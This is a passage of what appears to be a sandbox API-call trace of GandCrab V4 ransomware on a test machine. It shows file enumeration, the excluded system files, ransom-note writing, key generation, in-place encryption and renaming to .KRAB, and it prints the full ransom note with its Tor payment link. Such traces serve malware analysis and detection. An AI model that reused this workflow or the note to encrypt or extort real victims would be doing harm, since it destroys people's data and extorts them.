lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\KRAB-DECRYPT.txt" [0092.737] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.738] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\KRAB-DECRYPT.txt.KRAB") returned 53 [0092.738] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\KRAB-DECRYPT.txt") returned 48 [0092.738] lstrlenW (lpString=".txt") returned 4 [0092.738] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.738] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0092.738] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.739] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\KRAB-DECRYPT.txt") returned 48 [0092.739] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Downloads\\KRAB-DECRYPT.txt") returned 48 [0092.739] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0092.739] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0092.739] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0092.739] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0092.739] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0092.739] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0092.739] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0092.739] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0092.739] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0092.739] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0092.739] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.740] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0092.740] FindClose (in: hFindFile=0xfbd3e0 | out: hFindFile=0xfbd3e0) returned 1 [0092.740] CloseHandle (hObject=0x320) returned 1 [0092.740] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0092.740] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0092.740] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0092.740] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Favorites" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites" [0092.740] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\" [0092.740] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0092.741] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0092.741] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0092.741] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0092.741] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0092.741] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.742] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.742] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\\\KRAB-DECRYPT.txt") returned 49 [0092.742] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\favorites\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0092.743] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0092.743] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0092.744] CloseHandle (hObject=0x320) returned 1 [0092.744] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.745] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.745] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x27, wMilliseconds=0x3b4)) [0092.745] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.746] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0092.746] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0092.746] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\d2ca4a08d2ca4dee3d.lock") returned 55 [0092.746] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\favorites\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0092.750] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.750] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.751] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\") returned 32 [0092.751] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\*" [0092.751] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbd7a0 [0092.751] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.751] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0092.751] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.751] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.751] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0092.751] lstrcmpW (lpString1="Bing.url", lpString2=".") returned 1 [0092.751] lstrcmpW (lpString1="Bing.url", lpString2="..") returned 1 [0092.751] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\", lpString2="Bing.url" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Bing.url") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Bing.url" [0092.751] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.755] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Bing.url.KRAB") returned 45 [0092.755] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Bing.url") returned 40 [0092.755] lstrlenW (lpString=".url") returned 4 [0092.755] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.755] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".url ") returned 5 [0092.755] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.756] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Bing.url") returned 40 [0092.756] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Bing.url") returned 40 [0092.756] lstrcmpiW (lpString1="Bing.url", lpString2="desktop.ini") returned -1 [0092.756] lstrcmpiW (lpString1="Bing.url", lpString2="autorun.inf") returned 1 [0092.756] lstrcmpiW (lpString1="Bing.url", lpString2="ntuser.dat") returned -1 [0092.756] lstrcmpiW (lpString1="Bing.url", lpString2="iconcache.db") returned -1 [0092.756] lstrcmpiW (lpString1="Bing.url", lpString2="bootsect.bak") returned -1 [0092.756] lstrcmpiW (lpString1="Bing.url", lpString2="boot.ini") returned -1 [0092.756] lstrcmpiW (lpString1="Bing.url", lpString2="ntuser.dat.log") returned -1 [0092.756] lstrcmpiW (lpString1="Bing.url", lpString2="thumbs.db") returned -1 [0092.756] lstrcmpiW (lpString1="Bing.url", lpString2="KRAB-DECRYPT.html") returned -1 [0092.756] lstrcmpiW (lpString1="Bing.url", lpString2="KRAB-DECRYPT.txt") returned -1 [0092.756] lstrcmpiW (lpString1="Bing.url", lpString2="CRAB-DECRYPT.txt") returned -1 [0092.757] lstrcmpiW (lpString1="Bing.url", lpString2="ntldr") returned -1 [0092.757] lstrcmpiW (lpString1="Bing.url", lpString2="NTDETECT.COM") returned -1 [0092.757] lstrcmpiW (lpString1="Bing.url", lpString2="Bootfont.bin") returned -1 [0092.757] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.757] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0092.758] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0092.759] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0092.759] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0092.759] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0092.759] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0092.759] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.760] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10111b0) returned 1 [0092.760] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0092.761] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0092.761] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0092.761] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0092.761] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0092.761] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.762] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0092.762] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0092.762] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0092.762] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0092.763] GetLastError () returned 0x0 [0092.763] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0092.763] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0092.763] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0092.763] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0092.763] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0092.763] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0092.764] GetLastError () returned 0x0 [0092.764] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0092.764] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0092.764] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Bing.url" (normalized: "c:\\users\\ciihmnxmn6ps\\favorites\\bing.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0092.765] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0092.766] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0092.766] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0xd0, lpOverlapped=0x0) returned 1 [0092.839] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffff30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.839] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0xd0, lpOverlapped=0x0) returned 1 [0092.839] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0092.839] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.858] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.858] CloseHandle (hObject=0x434) returned 1 [0092.859] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.862] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Bing.url" (normalized: "c:\\users\\ciihmnxmn6ps\\favorites\\bing.url"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\Bing.url.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\favorites\\bing.url.krab")) returned 1 [0092.971] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.971] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0092.971] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0092.971] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0092.971] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\d2ca4a08d2ca4dee3d.lock" [0092.971] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.972] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 60 [0092.972] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\d2ca4a08d2ca4dee3d.lock") returned 55 [0092.972] lstrlenW (lpString=".lock") returned 5 [0092.972] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.972] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0092.972] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.973] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.973] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0092.973] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0092.973] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0092.973] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\desktop.ini" [0092.973] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.973] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\desktop.ini.KRAB") returned 48 [0092.974] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\desktop.ini") returned 43 [0092.974] lstrlenW (lpString=".ini") returned 4 [0092.974] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.974] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0092.974] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.974] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\desktop.ini") returned 43 [0092.974] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\desktop.ini") returned 43 [0092.974] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0092.975] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.975] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0092.975] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0092.975] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0092.975] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\KRAB-DECRYPT.txt" [0092.975] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0092.977] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\KRAB-DECRYPT.txt.KRAB") returned 53 [0092.977] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\KRAB-DECRYPT.txt") returned 48 [0092.977] lstrlenW (lpString=".txt") returned 4 [0092.977] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0092.978] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0092.978] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.978] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Favorites\\KRAB-DECRYPT.txt") returned 48 [0092.978] 